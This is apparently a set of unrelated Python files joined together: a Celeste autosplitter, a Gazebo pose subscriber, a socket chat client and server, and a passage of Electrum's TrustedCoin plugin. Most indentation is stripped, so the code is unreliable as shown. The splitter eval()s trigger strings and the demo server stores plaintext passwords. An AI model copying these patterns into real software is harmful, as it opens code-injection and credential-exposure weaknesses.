while not os.path.exists(filename):
time.sleep(1)
self.fp = open(filename, 'rb')
self.live = True
self.thread = threading.Thread(target=self.update_loop)
self.thread.daemon = True
self.thread.start()
@property
def chapter_name(self):
if self.chapter == 0:
return 'Prologue'
if self.chapter == 8:
return 'Epilogue'
if self.chapter == 10:
return '9'
if self.mode == 0:
side = 'a'
elif self.mode == 1:
side = 'b'
else:
side = 'c'
return '%d%s' % (self.chapter, side)
def __getitem__(self, k):
try:
return getattr(self, k)
except AttributeError as e:
raise KeyError(k) from e
@property
def dict(self):
return {x: getattr(self, x) for x in self.all_attrs}
def update_loop(self):
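        # Struct layout mirrors the field map in the header comment above;
        # 'x' bytes are alignment padding, '100s' is the level-name buffer.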
fmtstring = struct.Struct('Qii???QI??QIIIxxxxI?i100s')
while self.live:
last_tick = time.time()
self.fp.seek(0)
dat = self.fp.raw.read(fmtstring.size)
_, self.chapter, self.mode, self.timer_active, \
self.chapter_started, self.chapter_complete, \
chapter_time, self.chapter_strawberries, \
self.chapter_cassette, self.chapter_heart, file_time, \
self.file_strawberries, self.file_cassettes, self.file_hearts, \
self.chapter_checkpoints, self.in_cutscene, self.death_count, level_name \
= fmtstring.unpack(dat)
self.chapter_time = chapter_time // 10000
self.file_time = file_time // 10000
self.level_name = level_name.split(b'\0')[0].decode()
timeout = last_tick + 0.001 - time.time()
if timeout > 0:
time.sleep(timeout)
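# A Trigger wraps a Python expression that is evaluated against the live
# AutoSplitterInfo (bound to `asi`), e.g. "asi.chapter_complete".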
class Trigger:
def __init__(self, name, end_trigger):
self.name = name
self.end_trigger = end_trigger
def check_trigger(self, asi): # pylint: disable=unused-argument
return eval(self.end_trigger) # pylint: disable=eval-used
def __repr__(self):
return '<Trigger %s>' % self.name
class Split:
def __init__(self, names, level=0):
if type(names) == str:
names = [names]
if len(names) == 0:
raise ValueError("Need at least one name")
self.names = names
self.level = level
self.identity = random.randrange(2**64)
def level_name(self, level):
if level < self.level:
raise ValueError("Why are you trying to render %s at level %d?" % (self, level))
try:
return self.names[level - self.level]
except IndexError:
return self.names[-1]
def __eq__(self, other):
return hasattr(other, 'identity') and self.identity == other.identity
def __hash__(self):
return hash(self.identity)
def __repr__(self):
return '<Split %s>' % self.names[0]
def __getstate__(self):
return self.__dict__
def __setstate__(self, state):
# migration
if 'name' in state:
state['names'] = [state.pop('name')]
self.__dict__.update(state)
class StartTimer:
def __repr__(self):
return '<StartTimer>'
notpassed = object()
class SplitsRecord(collections.OrderedDict):
def segment_time(self, split, level=0, fallback=notpassed):
found_prev = None
for cur in self:
if cur == split:
break
if cur.level <= level:
found_prev = cur
else:
if fallback is not notpassed:
return fallback
raise KeyError(split)
if found_prev is None:
return self[split]
elif self[split] is None or self[found_prev] is None:
return None
else:
return self[split] - self[found_prev]
class Route(collections.UserList):
def __init__(self, name, time_field, pieces, level_names, reset_trigger):
if type(pieces[-1]) is not Split or pieces[-1].level != 0:
raise TypeError("Last piece of route must be top-level Split")
super().__init__(pieces)
self.name = name
self.time_field = time_field
self.levels = max(piece.level for piece in pieces if type(piece) is Split) + 1
self.splits = [x for x in self if type(x) is Split]
self.level_names = level_names
self.reset_trigger = reset_trigger
def __getstate__(self):
return (list(self), self.name, self.time_field, self.level_names, self.reset_trigger)
def __setstate__(self, state):
if type(state) is dict:
self.__dict__.update(state)
elif len(state) == 3:
self.__init__(state[1], state[2], state[0], ['Segment', 'Subsegment'], None)
else:
self.__init__(state[1], state[2], state[0], state[3], state[4])
def split_idx(self, i, level=0):
while type(self[i]) is not Split or self[i].level > level:
i += 1
if i >= len(self):
return None
return self.splits.index(self[i])
@property
def all_subsegments(self):
prev = None
for split in self.splits:
if prev is not None:
for level in range(prev.level, split.level, -1):
yield (split, level)
yield (split, split.level)
prev = split
class SplitsManager:
def __init__(self, asi, route, compare_pb=None, compare_best=None):
self.asi = asi
self.route = route
self.compare_pb = compare_pb if compare_pb is not None else SplitsRecord()
self.compare_best = compare_best if compare_best is not None else {}
self.current_times = SplitsRecord()
self.current_piece_idx = 0
self.start_time = 0
self.started = False
# migration
parents = {}
for split in self.route.splits:
parents[split.level] = split
if split not in self.compare_pb:
self.compare_pb[split] = None
else:
self.compare_pb.move_to_end(split)
for level in range(split.level, self.route.levels):
key = (split, level)
if key not in self.compare_best:
self.compare_best[key] = None
@property
def done(self):
return self.current_piece_idx >= len(self.route)
@property
def current_piece(self):
if self.done:
return None
return self.route[self.current_piece_idx]
def _current_split_idx(self, level=0):
idx = self.route.split_idx(self.current_piece_idx, level)
if idx is None:
return None
while self.route.splits[idx].level > level:
idx += 1
return idx
def _forward_split(self, idx, level=0):
idx += 1
if idx >= len(self.route.splits):
return None
while self.route.splits[idx].level > level:
idx += 1
if idx >= len(self.route.splits):
return None
return idx
def _backwards_split(self, idx, level=0):
idx -= 1
if idx < 0:
return None
while self.route.splits[idx].level > level:
idx -= 1
if idx < 0:
return None
return idx
def current_split(self, level=0):
if self.done:
return None
idx = self._current_split_idx(level)
return self.route.splits[idx]
def previous_split(self, level=0):
idx = self._current_split_idx(level)
idx = self._backwards_split(idx, level)
if idx is None:
return None
return self.route.splits[idx]
def is_segment_done(self, split):
return self.current_piece_idx > self.route.index(split)
@property
def current_time(self):
return self.asi[self.route.time_field] - self.start_time
def current_segment_time(self, level=0):
if self.done:
return None
prev_split = self.previous_split(level)
if prev_split is None:
return self.current_time
split_start = self.current_times[prev_split]
if split_start is None:
return None
return self.current_time - split_start
def best_possible_time(self):
return None
def split(self, split):
self.current_times[split] = self.current_time
def commit(self):
if self.route.splits[-1] in self.current_times:
cur_time = self.current_times[self.route.splits[-1]]
pb_time = self.compare_pb[self.route.splits[-1]]
if pb_time is None or cur_time < pb_time:
self.compare_pb = self.current_times
# TODO: do we care about not mutating this reference?
self.compare_best = dict(self.compare_best)
for key in self.route.all_subsegments:
split, level = key
seg = self.current_times.segment_time(split, level, None)
best = self.compare_best[key]
if seg is not None and (best is None or seg < best):
self.compare_best[key] = seg
def reset(self):
self.current_piece_idx = 0
self.current_times = SplitsRecord()
self.started = False
self.start_time = 0
def skip(self, n=1):
while not self.done:
if type(self.current_piece) is Split:
self.current_times[self.current_piece] = None
self.current_piece_idx += 1
elif type(self.current_piece) is StartTimer:
self.start_time = self.asi[self.route.time_field]
self.current_piece_idx += 1
else:
if n:
self.started = True
self.current_piece_idx += 1
n -= 1
else:
break
def rewind(self, n=1):
while self.current_piece_idx:
if type(self.current_piece) is Split:
del self.current_times[self.current_piece]
self.current_piece_idx -= 1
elif type(self.current_piece) is StartTimer:
self.current_piece_idx -= 1
self.started = False
else:
if n:
self.current_piece_idx -= 1
n -= 1
else:
if self.current_piece.check_trigger(self.asi):
self.current_piece_idx -= 1
else:
break
def update(self):
if type(self.route.reset_trigger) is Trigger and self.route.reset_trigger.check_trigger(self.asi):
self.commit()
self.reset()
if self.done:
return
while not self.done:
if type(self.current_piece) is Split:
self.split(self.current_piece)
self.current_piece_idx += 1
elif type(self.current_piece) is StartTimer:
self.start_time = self.asi[self.route.time_field]
self.current_piece_idx += 1
else:
if self.current_piece.check_trigger(self.asi):
self.started = True
self.current_piece_idx += 1
else:
break
def parse_mapname(line):
if line.lower() == 'farewell':
return 10, 0
if line.lower() == 'prologue':
return 0, 0
if line.isdigit():
side = 'a'
else:
line, side = line[:-1], line[-1]
side = side.lower()
assert side in ('a', 'b', 'c')
mode = ord(side) - ord('a')
chapter = int(line)
if chapter >= 8:
chapter += 1
return chapter, mode
def _main():
asi = AutoSplitterInfo()
max_width = max(len(attr) for attr in asi.all_attrs)
while True:
data = '\x1b\x5b\x48\x1b\x5b\x4a'
time.sleep(0.01)
for attr in asi.all_attrs:
val = asi.dict[attr]
if attr.endswith('_time'):
val = fmt_time(val)
data += attr.ljust(max_width) + ': ' + str(val) + '\n'
print(data)
if __name__ == '__main__':
_main()
|
__init__.py
|
from threading import Thread
import trollius
from trollius import From
import pygazebo
from pygazebo.msg import poses_stamped_pb2
from pyquaternion import Quaternion
from math import pi
loop = trollius.get_event_loop()
EXIT = False
def exit():
    global EXIT
    EXIT = True
    loop.stop()
    print("exiting... motion capture")
def parse_data(data):
message = poses_stamped_pb2.PosesStamped.FromString(data)
position = message.pose[0].position
position = (position.y, position.x, position.z)
orientation = message.pose[0].orientation
q = Quaternion(orientation.w, orientation.x, orientation.y * -1.0, orientation.z * -1.0)
convert_q = tuple(q*Quaternion(axis=[0, 0, 1], radians=pi * 0.5))
callback(1, position, convert_q)
@trollius.coroutine
def subscribe_loop(address):
manager = yield From(pygazebo.connect(address=address))
manager.subscribe('/gazebo/default/pose/info',
'gazebo.msgs.PosesStamped',
parse_data)
while not EXIT:
yield From(trollius.sleep(0.2))
def loop_in_thread(loop, address):
try:
trollius.set_event_loop(loop)
loop.run_until_complete(subscribe_loop(address))
except Exception as e:
print(e)
def create_motion_capture(address, cb):
    # store the user callback globally so parse_data can invoke it
    global callback
    callback = cb
    motion_capture = Thread(target=loop_in_thread, args=(loop, address,))
    motion_capture.exit = exit
    return motion_capture
class PositionEstimate(object):
def __init__(self):
self.positions_buffer = []
self.delay = 0.05
self.init = False
self.first_position = []
self.estimated_position = []
def is_ready(self):
return len(self.estimated_position) > 0
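    # Linear extrapolation: project the newest sample forward by `delay`
    # using the difference between the two most recent positions.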
def receive_new_position(self, x, y, z):
new_position = [x, y, z]
if not self.init:
self.first_position = new_position[:]
self.init = True
self.positions_buffer.append(new_position)
if len(self.positions_buffer) > 1:
self.positions_buffer = self.positions_buffer[-2:]
position = []
for i in range(3):
position.append((self.positions_buffer[-1][i] - self.positions_buffer[-2][i])*self.delay + self.positions_buffer[-1][i])
self.estimated_position = position
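    # Offset from the first fix in a NED-style frame: z is inverted so
    # that down is positive.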
@property
def ned_position(self):
x, y, z = self.estimated_position
x0, y0, z0 = self.first_position
return x - x0, y - y0, z0 - z
if __name__ == '__main__':
def callback(id, position, orientation):
print(id, position, orientation)
motion_capture = create_motion_capture(('127.0.0.1', 11345), callback)
motion_capture.start()
import time
time.sleep(5)
motion_capture.exit()
|
client-chat.py
|
import socket
import sys
import argparse
import threading
address = "127.0.0.1"
port = 4444
username = "Me"
servername = "Received"
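# Handshake: the server sends its display name first, the client replies
# with its username; after that both sides exchange raw UTF-8 text.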
def recv_data(s):
while True:
try:
data=s.recv(1024)
print(f"\n{servername}: {data.decode()}\n{username}: ", end="")
except ConnectionResetError:
if servername!="Received":
print(f"\nClosed by {servername}")
else:
print("\nClosed by other user.")
break
except ConnectionAbortedError:
print(f"\nConnection closed by {username.lower()}.")
break
s.close()
print("Program Exited")
sys.exit()
if __name__=="__main__":
parser = argparse.ArgumentParser(description="Simple Chat Client Program.")
parser.add_argument("-i", "--ipaddress", help="IP address of target server (Default: 127.0.0.1)")
parser.add_argument("-p", "--port", help="Listening port number of target server (Default: 4444)")
parser.add_argument("-u", "--username", help="The name used during connection")
args = parser.parse_args()
if args.ipaddress:
address=args.ipaddress
if args.port:
port=int(args.port)
if args.username:
username=args.username
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((address, port))
print("\nConnected Server IP: " + address)
print("Connected Server port: " + str(port))
print()
servername=s.recv(1024)
servername=servername.decode()
if servername=="Me":
servername="Received"
s.send(bytes(username, encoding="UTF-8"))
recv_ = threading.Thread(target=recv_data, args=(s,))
recv_.start()
while True:
try:
print(f"{username}: ",end="")
to_send=input()
s.send(bytes(to_send, encoding="UTF-8"))
except KeyboardInterrupt:
print("\nProgam Exited.")
s.close()
sys.exit()
except KeyboardInterrupt:
print("\nProgam Exited.")
s.close()
sys.exit()
finally:
s.close()
|
server.py
|
#!/usr/bin/python
'''
Andrei Dorin
06/10/2018
Server interface for WISP server implementation
'''
import argparse
import logging
import sys
import signal
import socket as so
import threading
import wisp_common as wcom
from wisp_common import WispRequest
from wisp_server import WispServer
# Database for user accounts, resets on server shutdown
DATASTORE = {
'andrei': {
'password': 'dorin',
'friends': ['safa', 'cameron', 'kenny', 'colbert']
},
'cameron': {
'password': 'graybill',
'friends': ['andrei']
},
'safa': {
'password': 'aman',
'friends': ['andrei']
},
'michael': {
'password': 'kain',
'friends': []
},
'kenny': {
'password': 'li',
'friends': ['andrei']
},
'colbert': {
'password': 'zhu',
'friends': ['andrei']
}
}
class Server():
'''
Main Server class
Handles UDP service discovery
Accepts TCP connections and delegates to WISP sessions
Provides callbacks for all commands
'''
def __init__(self):
self._logger = logging.getLogger(__name__)
self._socket = None
self._data_lock = threading.Lock()
self._sessions = []
self._sess_lock = threading.Lock()
self._handlers = {
WispRequest.AUTH: self._handle_auth,
WispRequest.LIST: self._handle_list,
WispRequest.SEARCH: self._handle_search,
WispRequest.ADD: self._handle_add,
WispRequest.DEL: self._handle_del,
WispRequest.CONV: self._handle_conv,
}
def start(self, addr, port):
'''Start UDP service discovery and TCP socket accepts'''
        self._logger.info(f'Starting service discovery on broadcast:{wcom.WISP_DEFAULT_PORT}')
        threading.Thread(target=self.service_discovery, args=(wcom.WISP_DEFAULT_PORT,), daemon=True).start()
self._setup_tcp_sock(addr, port)
# CONCURRENT
while True:
conn, addr = self._socket.accept()
self._logger.info(f'New connection from {addr}')
# Create new wisp session on a different thread for every client
# Since WispServer inherits from Thread, start() calls the run()
# Function defined in wisp_server.py
server = WispServer(conn, self._handlers, self._handle_message)
server.start()
# Save session for later
with self._sess_lock:
self._sessions.append(server)
@classmethod
    def service_discovery(cls, port):
        '''Service discovery system, meant to run as a separate thread'''
# Getting local IP
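        # connect() on a UDP socket sends no packets; it only selects the
        # outgoing interface, whose address getsockname() then reports.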
temp = so.socket(so.AF_INET, so.SOCK_DGRAM)
temp.connect(('8.8.8.8', port))
addr = temp.getsockname()[0]
temp.close()
while True:
udp = so.socket(so.AF_INET, so.SOCK_DGRAM)
udp.setsockopt(so.SOL_SOCKET, so.SO_REUSEADDR, 1)
udp.setsockopt(so.SOL_SOCKET, so.SO_BROADCAST, 1)
udp.bind(('', port))
data = udp.recv(len(wcom.WISP_ARP_REQ))
if data == wcom.WISP_ARP_REQ:
udp.sendto(wcom.WISP_ARP_RES + addr.encode(), ('255.255.255.255', port))
def _setup_tcp_sock(self, addr, port):
'''TCP socket init'''
self._logger.info(f'Starting TCP socket on {addr}:{port}')
self._socket = so.socket(so.AF_INET, so.SOCK_STREAM)
self._socket.setsockopt(so.SOL_SOCKET, so.SO_REUSEADDR, 1)
self._socket.bind((addr, port))
self._socket.listen(wcom.WISP_DEFAULT_CONNECTION_COUNT)
# ----- Handlers for all commands -----
def _handle_auth(self, username, password):
        '''Verifies username and password against database'''
with self._data_lock:
if username in DATASTORE:
if DATASTORE[username]['password'] == password:
return True, []
return False, ['Invalid Cred']
def _handle_list(self, username):
'''Returns friends list'''
with self._data_lock:
if username not in DATASTORE:
return False, ['Invalid user']
return True, DATASTORE[username]['friends']
def _handle_search(self, owner, lookup):
'''Searches database for users matching "lookup"'''
user_list = []
with self._data_lock:
for user in DATASTORE:
if user != owner and lookup in user and user not in DATASTORE[owner]['friends']:
user_list.append(user)
return True, user_list
def _handle_add(self, owner, user):
'''Adds new friend to friend list to both users'''
with self._data_lock:
if owner not in DATASTORE or user not in DATASTORE:
return False, ['Invalid User']
DATASTORE[owner]['friends'].append(user)
DATASTORE[user]['friends'].append(owner)
return True, []
def _handle_del(self, owner, user):
'''Deletes friend from both users lists'''
with self._data_lock:
if owner not in DATASTORE or user not in DATASTORE[owner]['friends']:
return False, ['Invalid Users']
DATASTORE[owner]['friends'].remove(user)
DATASTORE[user]['friends'].remove(owner)
return True, []
def _handle_conv(self, owner, target):
'''Validates user is online for conversation'''
with self._data_lock:
if target not in DATASTORE[owner]['friends']:
return False, ['Friend Unknown']
with self._sess_lock:
for conn in self._sessions:
if conn.user == target:
return True, []
return False, ['User offline']
def _handle_message(self, receiver, msg):
'''
Route message to destination session
Also cleans up dead sessions
'''
with self._sess_lock:
for i in range(len(self._sessions) -1, -1, -1):
connection = self._sessions[i]
if not connection.is_alive():
del self._sessions[i]
continue
if connection.user == receiver and connection.check_msg_state():
self._logger.debug(f'Routing message to {receiver}: {msg}')
connection.msgq.put(msg)
def signal_sigint(_, __):
'''
Signal handler for KeyboardInterrupt or SIGINT
'''
print('SIGINT Received, shutting down')
sys.exit(0)
def main():
'''
Main entry point of server
Argument parsing and initializing client
'''
parser = argparse.ArgumentParser(description='WISP chat server')
parser.add_argument('-v', '--verbosity', type=int, default=4, choices=[4, 3, 2, 1],
help='Verbosity of logger, 4: Error, 3: Warning, 2: Info, 1: Debug')
args = parser.parse_args()
logging.basicConfig()
logging.getLogger().setLevel(args.verbosity * 10)
signal.signal(signal.SIGINT, signal_sigint)
# SERVICE
server = Server()
server.start(wcom.WISP_DEFAULT_HOST, wcom.WISP_DEFAULT_PORT)
if __name__ == '__main__':
main()
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict, Union, Sequence, List
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum import ecc, constants, keystore, version, bip32, bitcoin
from electrum.bip32 import BIP32Node, xpub_type
from electrum.crypto import sha256
from electrum.transaction import PartialTxOutput, PartialTxInput, PartialTransaction, Transaction
from electrum.mnemonic import Mnemonic, seed_type, is_any_2fa_seed_type
from electrum.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum.i18n import _
from electrum.plugin import BasePlugin, hook
from electrum.util import NotEnoughFunds, UserFacingException
from electrum.storage import StorageEncryptionVersion
from electrum.network import Network
from electrum.base_wizard import BaseWizard, WizardWalletPasswordSetting
from electrum.logging import Logger
def get_signing_xpub(xtype):
if not constants.net.TESTNET:
xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
else:
xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
if xtype not in ('standard', 'p2wsh'):
raise NotImplementedError('xtype: {}'.format(xtype))
if xtype == 'standard':
return xpub
node = BIP32Node.from_xkey(xpub)
return node._replace(xtype=xtype).to_xpub()
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
def __init__(self, reason: Union[str, Exception] = None):
self.reason = reason
def __str__(self):
header = _("Error connecting to {} server").format('TrustedCoin')
reason = self.reason
if isinstance(reason, BaseException):
reason = repr(reason)
return f"{header}:\n{reason}" if reason else header
class TrustedCoinCosignerClient(Logger):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
Logger.__init__(self)
async def handle_response(self, resp: ClientResponse):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
def send_request(self, method, relative_url, data=None, *, timeout=None):
network = Network.get_instance()
if not network:
raise ErrorConnectingServer('You are offline.')
url = urljoin(self.base_url, relative_url)
if self.debug:
self.logger.debug(f'<-- {method} {url} {data}')
headers = {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
if method == 'get':
response = Network.send_http_on_proxy(method, url,
params=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
elif method == 'post':
response = Network.send_http_on_proxy(method, url,
json=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
else:
if self.debug:
self.logger.debug(f'--> {response}')
return response
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload,
timeout=60)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
plugin: 'TrustedCoinPlugin'
wallet_type = '2fa'
def __init__(self, db, storage, *, config):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, db, storage, config=config)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = {
'legacy': self.db.get('trustedcoin_billing_addresses', {}),
'segwit': self.db.get('trustedcoin_billing_addresses_segwit', {})
}
self._billing_addresses = {} # type: Dict[str, Dict[int, str]] # addr_type -> index -> addr
self._billing_addresses_set = set() # set of addrs
for addr_type, d in list(billing_addresses.items()):
self._billing_addresses[addr_type] = {}
# convert keys from str to int
for index, addr in d.items():
self._billing_addresses[addr_type][int(index)] = addr
self._billing_addresses_set.add(addr)
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.db)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self):
default = self.min_prepay()
n = self.config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay()
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(
self, *,
coins: Sequence[PartialTxInput],
outputs: List[PartialTxOutput],
fee=None,
change_addr: str = None,
is_sweep=False,
rbf=False) -> PartialTransaction:
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins=coins, outputs=o, fee=fee, change_addr=change_addr, rbf=rbf)
extra_fee = self.extra_fee() if not is_sweep else 0
if extra_fee:
address = self.billing_info['billing_address_segwit']
fee_output = PartialTxOutput.from_address_and_value(address, extra_fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= extra_fee:
raise
self.logger.info("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx: PartialTransaction, otp):
if not otp:
self.logger.info("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize_as_bytes().hex()
assert raw_tx[:10] == "70736274ff", f"bad magic. {raw_tx[:10]}"
try:
r = server.sign(short_id, raw_tx, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
raise UserFacingException(_('Invalid one-time password.')) from e
else:
raise
if r:
received_raw_tx = r.get('transaction')
received_tx = Transaction(received_raw_tx)
tx.combine_with_other_psbt(received_tx)
self.logger.info(f"twofactor: is complete {tx.is_complete()}")
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
billing_addresses_of_this_type = self._billing_addresses[addr_type]
saved_addr = billing_addresses_of_this_type.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i, addr_type=addr_type)
billing_addresses_of_this_type[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
billing_addresses_of_this_type[billing_index] = address
self._billing_addresses_set.add(address)
self._billing_addresses[addr_type] = billing_addresses_of_this_type
self.db.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
self.db.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
# FIXME this often runs in a daemon thread, where storage.write will fail
self.db.write(self.storage)
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(db):
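    # The long id is sha256 over the sorted, concatenated xpubs; the short
    # id (hex sha256 of the long id) is what the TrustedCoin API uses.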
def make_long_id(xpub_hot, xpub_cold):
return sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = db.get('x1/')['xpub']
xpub2 = db.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s) -> str:
rootnode = BIP32Node.from_xkey(xpub)
child_pubkey, child_chaincode = bip32._CKD_pub(parent_pubkey=rootnode.eckey.get_public_key_bytes(compressed=True),
parent_chaincode=rootnode.chaincode,
child_index=s)
child_node = BIP32Node(xtype=rootnode.xtype,
eckey=ecc.ECPubkey(child_pubkey),
chaincode=child_chaincode)
return child_node.to_xpub()
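# Billing addresses derive from the public billing xpub: a child node keyed
# by the wallet's long user id, then one pubkey per billing index.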
def make_billing_address(wallet, num, addr_type):
long_id, short_id = wallet.get_user_id()
